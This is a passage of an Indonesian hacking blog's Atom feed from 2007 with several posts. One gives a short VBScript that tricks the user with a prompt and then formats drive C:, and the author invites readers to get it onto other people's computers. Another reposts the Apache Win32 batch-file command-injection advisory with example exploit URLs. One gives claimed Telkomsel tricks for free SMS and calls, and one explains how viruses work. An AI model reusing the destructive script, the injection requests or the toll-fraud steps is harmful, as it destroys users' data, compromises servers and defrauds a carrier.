href='http://www.blogger.com/feeds/1331045226915696546/posts/default/6110645373663604211'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/pasang-bouncer.html' title='Pasang Bouncer'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-7604949889191914672</id><published>2007-03-31T03:57:00.000+07:00</published><updated>2007-03-31T04:01:13.082+07:00</updated><title type='text'>Visual Basic Sederhana Tapi berbahaya</title><content type='html'>Set WshShell = WScript.CreateObject("WScript.Shell")&lt;br /&gt;X = MsgBox("Halo dunia  bertanya siapkah anda mengganti operating system anda ?", vbYesNo, "Awas bahaya ngga tanggung jawab!")&lt;br /&gt;If X = 6 Then&lt;br /&gt;WshShell.Run("format.com /y C:")&lt;br /&gt;End If&lt;br /&gt;---------------------------------------------------------&lt;br /&gt;&lt;br /&gt;itu kode VBS yang saya buat sangat simple dan saya rasa mudah untuk dimengerti kalangan umum kalau di jalankan maka akan memformat drive c: dengan indahnya Apa saja shell command?? cari pake GOGGLE.COM ! pokoknya idop google :P&lt;br /&gt;Here sample command :&lt;br /&gt;&lt;br /&gt;run.exe rundll user,#7&lt;br /&gt;run.exe rundll user,#4&lt;br /&gt;run.exe rundll user,#3&lt;br /&gt;dan lain lain nah........&lt;br /&gt;&lt;br /&gt; sekarang bagaimana caranya file ini bisa masuk ke komputer orang?? pikirkan sendiri bagaimana?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-7604949889191914672?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/7604949889191914672/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=7604949889191914672' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7604949889191914672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7604949889191914672'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/visual-basic-sederhana-tapi-berbahaya.html' title='Visual Basic Sederhana Tapi berbahaya'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-3945787275627293337</id><published>2007-03-31T03:53:00.000+07:00</published><updated>2007-03-31T03:56:08.196+07:00</updated><title type='text'>Dasar Pengetahuan Tentang Virus</title><content type='html'>&lt;div align="justify"&gt;Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat  kita  semua  mengerti danmemahami tentang virus.&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;A.ASAL MUASAL VIRUS&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;1949, John Von Neuman, menggungkapkan   " teori self altering automata " yang merupakan hasil riset dari para ahli matematika.&lt;br /&gt;1960, lab BELL (AT&amp;T), para ahli di lab BELL (AT&amp;amp;T)  mencoba-coba  teori yang diungkapkan oleh john v neuman, mereka bermain-main   dengan  teori tersebut untuk suatu jenis permainan/game. Para  ahli  tersebut  membuat  program yang dapat memperbanyak dirinya dan dapat  menghancurkan program buatan lawan.Program yang mampu bertahan dan menghancurkan semua program lain,   maka akan dianggap sebagai   pemenangnya. Permainan ini akhirnya  menjadi permainan   favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai mewaspadai permainan ini dikarenakan   program  yang diciptakan makin lama    makin    berbahaya,  sehingga  mereka melakukan pengawasan dan pengamanan yang ketat.&lt;br /&gt;1980,  program tersebut  yang  akhirnya  dikenal dengan nama "virus" ini berhasil menyebar diluar lingkungan  laboratorium, dan mulai beredar  di dunia cyber.&lt;br /&gt;1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;B.PENGERTIAN VIRUS&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;" A program that can infect other  programs by modifying them to  include a slighty altered copy of itself.A virus  can spread throughout a computer system or network using the authorization   of every   user using it to infect their programs. Every  programs that gets infected can also act as a virus that infection grows “ ( Fred Cohen )&lt;br /&gt;Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).&lt;br /&gt;Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi memiliki perbedaan yang mendasar dengan   program-program   lainnya,yaitu virus   dibuat   untuk  menulari  program-program  lainnya,     mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu  dicatat  disini, virus hanya akan menulari apabila program pemicu atau program  yang telah   terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan ini tidak akan bahas worm karena  nanti  akan   mengalihkan   kita   dari pembahasan mengenai virus ini.&lt;br /&gt;C.KRITERIA VIRUS&lt;br /&gt;Suatu program yang disebut virus baru dapat dikatakan adalah benar  benar virus apabila minimal memiliki 5 kriteria :&lt;br /&gt;&lt;/div&gt;&lt;div align="justify"&gt;1. Kemampuan suatu virus untuk mendapatkan informasi   &lt;/div&gt;&lt;div align="justify"&gt;2. Kemampuannya untuk memeriksa suatu program   &lt;/div&gt;&lt;div align="justify"&gt;3. Kemampuannya untuk menggandakan diri dan menularkan   &lt;/div&gt;&lt;div align="justify"&gt;4. Kemampuannya melakukan manipulasi    &lt;/div&gt;&lt;div align="justify"&gt;5. Kemampuannya untuk menyembunyikan diri.&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sanggat diperlukan.&lt;/div&gt;&lt;div align="justify"&gt;&lt;br /&gt;1.Kemampuan untuk mendapatkan informasi&lt;br /&gt;Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .&lt;br /&gt;2.Kemampuan memeriksa suat program&lt;br /&gt;Suatu virus juga harus bias untuk  memeriksa  suatu  program  yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah maka dia akan percuma menularinya 2  kali. Ini sangat berguna untuk meningkatkan kemampuan  suatu virus dalam hal  kecepatan menginfeksi suatu file/program.Yang  umum dilakukan oleh virus  adalah memiliki/ memberi   tanda  pada  file/program  yang  telah   terinfeksi sehingga  mudah untuk dikenali  oleh  virus tersebut . Contoh penandaan adalah misalnya memberikan suatu byte  yang    unik  disetiap file yang telah terinfeksi.&lt;br /&gt;3.Kemampuan untuk menggandakan diri&lt;br /&gt;Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. Inti dari  virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon   korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/   file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatas file/program yang diinfeksi.   Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:&lt;br /&gt;a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)b.Program virus yang sudah di   eksekusi/load ke memori  akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.&lt;br /&gt;4.Kemampuan mengadakan manipulasi&lt;br /&gt;Rutin (routine) yang dimiliki suatu virus akan  dijalankan setelah virus menulari   suatu file/program. isi dari suatu rutin ini dapat  beragam mulai dari yang teringan  sampai pengrusakan. rutin ini umumnya digunakan  untuk memanipulasi program ataupun mempopulerkan pembuatnya!  Rutin ini memanfaatkan kemampuan dari  suatu  sistem operasi (Operating System) , sehingga  memiliki   kemampuan   yang sama dengan  yang dimiliki sistem operasi. misal:&lt;br /&gt;a.Membuat gambar atau pesan pada monitorb.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari   drive di pcc.Memanipulasi program/file yang ditularid.Merusak program/filee.Mengacaukan kerja printer , dsb&lt;br /&gt;5.Kemampuan Menyembunyikan diri&lt;br /&gt;Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.langkah langkah yang biasa dilakukan adalah:&lt;br /&gt;-Program asli/virus disimpan dalam bentuuk kode mesin dan digabung dengan   program lain yang dianggap berguna oleh pemakai.-Program virus diletakkan pada Boot Recoord  atau   track yang jarang  diperhatikan oleh komputer itu sendiri-Program virus dibuat sependek mungkin,  dan hasil file yang diinfeksi tidak  berubah  ukurannya-Virus tidak mengubah keterangan waktu ssuatu file-dll&lt;br /&gt;D.SIKLUS HIDUP VIRUS&lt;br /&gt;Siklus hidup virus secara umum, melalui 4 tahap:&lt;br /&gt;o Dormant phase ( Fase Istirahat/Tidur )Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini&lt;br /&gt;o Propagation phase ( Fase Penyebaran )Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya)&lt;br /&gt;o Trigerring phase ( Fase Aktif )Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase&lt;br /&gt;o Execution phase ( Fase Eksekusi )Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-3945787275627293337?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/3945787275627293337/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=3945787275627293337' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3945787275627293337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3945787275627293337'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/dasar-pengetahuan-tentang-virus.html' title='Dasar Pengetahuan Tentang Virus'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-5802020420101471646</id><published>2007-03-31T03:49:00.000+07:00</published><updated>2007-03-31T03:57:23.401+07:00</updated><title type='text'>Vurlnerability Apache</title><content type='html'>&lt;div align="justify"&gt;Kemungkinan menggunakan remote command dengan penggunaan karakter ''. Pada Apache Web Server 2.0.X disertakan file /cgi-bin/test-cgi.bat yang dapat digunakan untuk pengexploitasian karakter '' ini. Tetapi bukan hanya itu saja, semua file dengan extensi .bat atau .cmd dapat digunakan untuk exploitai ini.&lt;br /&gt;&lt;br /&gt;Contoh Penggunaan :&lt;br /&gt;&lt;br /&gt;1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd. conf Perintah ini untuk mengkopi file httpd.conf ke public wwwroot (sama dengan c:\inetpub\wwwroot di IIS)&lt;br /&gt;&lt;br /&gt;2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html Perintah ini untuk menambahkan kata FOOBAR ke file index.html di public wwwroot&lt;br /&gt;&lt;br /&gt;3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt Pasti tau :)&lt;br /&gt;&lt;br /&gt;Catatan ;&lt;br /&gt;Karakter '+' menandakan spasi (spacebar) (sama dengan karakter %20 di IIS)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ORIGINAL :&lt;br /&gt;Vulnerability in Apache for Win32 batch file processing - Remote command execution&lt;br /&gt;= Author: Ory Segal, Sanctum inc. http://www.sanctuminc.com&lt;br /&gt;= Release date: March, 21st 2002 (Vendor was notified at: Feb. 13th 2002)&lt;br /&gt;= Vendor: Apache group&lt;br /&gt;= Product: Apache web server (Win32) - Running DOS batch files&lt;br /&gt;&lt;br /&gt;Tested on:&lt;br /&gt;- Apache 1.3.23&lt;br /&gt;- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat file which enables this attack)&lt;br /&gt;&lt;br /&gt;= Severity: High, remote command execution and arbitrary file viewing.&lt;br /&gt;&lt;br /&gt;= CVE candidate: CAN-2002-0061 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0061)&lt;br /&gt;&lt;br /&gt;= Summary: Because of a the way Apache web server handles DOS batch scripts it is possible to execute remote commands on the web server by using the pipe ('') character.&lt;br /&gt;&lt;br /&gt;** IMPORTANT **&lt;br /&gt;The Apache 2.0.x installation is shipped with the default script /cgi-bin/test-cgi.bat which can be exploited, but it should be noted that ANY '.bat' or '.cmd' script will allow exploitation of this vulnerability.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;= Description: When a request for a DOS batch file (.bat or .cmd) is sent to an Apache web server, the server will spawn a shell interpreter (cmd.exe by default) and will run the script with the parameters sent to it by the user. Because no proper validation is done on the input, it is possible to send a pipe character ('') with commands appended to it as parameters to the CGI script, and the shell interpreter will execute them.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;1) http://TARGET/cgi-bin/test-cgi.bat?copy+..confhttpd.conf+..htdocshttpd.conf&lt;br /&gt;&lt;br /&gt;This request will copy the httpd.conf file residing in the /conf directory of the Apache installation, into the virtual web root where it can be viewed by any user.&lt;br /&gt;&lt;br /&gt;2) http://TARGET/cgi-bin/test-cgi.bat?echo+Foobar++..htdocsindex.html&lt;br /&gt;&lt;br /&gt;This will append the string "Foobar" to the index.html file residing in the virtual web root directory.&lt;br /&gt;&lt;br /&gt;3) http://TARGET/cgi-bin/test-cgi.bat?dir+c:+..htdocsdir.txt&lt;br /&gt;&lt;br /&gt;This will create a file containing the directory listing of the C: drive, and will put the file in the virtual web root, where any user can read it.&lt;br /&gt;&lt;br /&gt;** Notes:&lt;br /&gt;&lt;br /&gt;1) Url-Decoding is not provided by Apache except for the '+' character which is substituted by a space character.&lt;br /&gt;&lt;br /&gt;2) Spilling the output into the STDOUT would most likely cause Apache to write an error message since it expects the STDOUT of a CGI script to have an HTTP response format (potential HTTP headers followed by a mandatory blank line followed by a response body). Therefore in order to view the result of a command, it is&lt;br /&gt;recommended that you redirect the output to a file under the web server's virtual root.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;= Solution: Upgrade your Apache web server to: 1.3.24 (which should be available later today), or 2.0.34-beta (which will be published soon). Downloads are located at:&lt;br /&gt;http://www.apache.org/dist/httpd/ &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-5802020420101471646?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/5802020420101471646/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=5802020420101471646' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5802020420101471646'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5802020420101471646'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/kemungkinan-menggunakan-remote-command.html' title='Vurlnerability Apache'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-5056682941019119899</id><published>2007-03-31T03:13:00.000+07:00</published><updated>2007-03-31T03:49:26.470+07:00</updated><title type='text'>Bug Telkomsel</title><content type='html'>&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;FreeSMS / SMS gratisFreeSMS ke sejumlah simcard dengan kode simcard 081226***** (simcard dengan code wilayah 26*****) kalau tidak salah code area jakarta.&lt;br /&gt;Dengan bug terdapat pada sistem losting data transfers pada tiap melakukan sms sending. (atau mungkin memang dari pihak telkomsel sengaja dibuka ? ) hingga dengan bug ini kita bisa manfaatkan sejumlah fasilitas sending sms dengan semua format ke sejumlah simcard dengan kode area 26***** / 081226***** secara free /gratis. &lt;/span&gt;&lt;/div&gt;&lt;span style="font-family:verdana;font-size:85%;"&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;Dengan cara sebagai berikut:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;1.Simcard yang akan dipakai HARUS turunan Telkomsel (Simpati / As / Hallo / Hoki ,dll) &lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;2.Tulis Sms seperti biasa dengan format bebas : D &lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;3.Cara kirim sebagai berikut: (perhatikan – karena masih ditemukan pada code area 26*****)&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:Verdana;font-size:85%;color:#000000;"&gt;&lt;/span&gt; &lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="color:#000000;"&gt;•nomor tujuan misal 0812266523* &lt;maaf&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;•jadi kita hanya tuliskan nomor tujuannya dengan cara : 2266523* &lt;*nya ganti dgn angka aja atau terserah mau dicoba dengan nomor mana aja&gt;•dan kemudian … ? nice job .. terkirim juga kan…. &lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="color:#000000;"&gt;&lt;span style="font-family:verdana;"&gt;•&lt;/span&gt;&lt;span style="font-family:verdana;"&gt;Bisa kita lakukan paling enak bila ga punya pulsa ? bisa lebih asik.Ingat … ceck sekali lagi pulsa anda bila tdk yakin… ? saya jamin ?&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;•Hanya bisa/berlaku di simcard turunan telkomsel saja.&lt;br /&gt;Oke .. nice … Note : BILA TRIK TERDAPAT LAPORAN PESAN FAILED/GAGAL BERARTI ADA 2 ARTIAN : 1) NOMOR YANG KITA TUJU TDK TERDAFTAR/TDK ADA &lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;2) PIHAK TELKOMSEL TELAH MEMPATCHING SYSTEM INI &lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-size:85%;color:#000000;"&gt;&lt;/span&gt; &lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="color:#000000;"&gt;&lt;strong&gt;Trik ke 2&lt;/strong&gt;&lt;br /&gt;TELPHONE GRATIS INTERNASIONAL (Ke negara Cyprus ? )&lt;br /&gt;Dengan simcard turunan Telkomsel kita bisa melakukan telefon gratis ke negara cyprus (kenapa cyprus? … heheh saat ini felling saya masih ke tahap “aneh” ) karena bug yang saya peroleh adalah kode area negara +357******** .&lt;br /&gt;Ntah karena angin apa pihak Telkom dengan telkomselnya melakukan losting data area ke negara Cyprus..? itu juga tersirat dalam fikiran saya. Dengan demikian telephon secara free/tanpa biaya sepeserpun bisa kita lakukan. Hingga sampai kapasitas bisa ngobrol dengan “bule” diluar negeri sana sepuas hati sampai “kuping panas” (lumayan untuk latihan tofel/ cari cewek bule ).&lt;br /&gt;Oke triknya seperti biasa:1.Gunakan simcard turunan Telkomsel (Simpati / As / Hallo / Hoki ,dll). 2.Ceck terlebih dulu pulsa anda bila blum yakin, (DIJAMIN/garansi ?)3.Ketik nomor telefon seperti biasa diawali dengan kode area tujuan negara tadi… misal : +35799942026 / +35795621145 dll ? banyak sekali she … hampir bisa dibilang semua nomor bisa kita hubungi FREE 4.Bila tdk terdapat nada tone berarti nomor tersebut blum dipasang/sedang kena galian kabel telkom disana.5.Dengarkan … apakah bisa … ? … 6.Nice .. crongatulation … 7.Telfonlah sampai kuping panas dan sampai bibir anda keriting .&lt;br /&gt;Note: JANGAN LAKUKAN TRIK MENGGUNAKAN SIMCARD SELAIN TELKOMSEL!!KARENA TRIK INI TIDAK BERFUNGSI PADA SIMCARD LAIN….&lt;br /&gt;Dalam hal ini pihak telkomsel belum merasa dirugikan karena pihak telkomsel tidak tahu hal ini atau memang pura² tidak tahu&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-family:verdana;font-size:85%;color:#000000;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="justify"&gt;&lt;span style="font-size:85%;color:#000000;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-5056682941019119899?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/5056682941019119899/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=5056682941019119899' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5056682941019119899'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5056682941019119899'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/bug-telkomsel.html' title='Bug Telkomsel'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>13</thr:total></entry></feed>
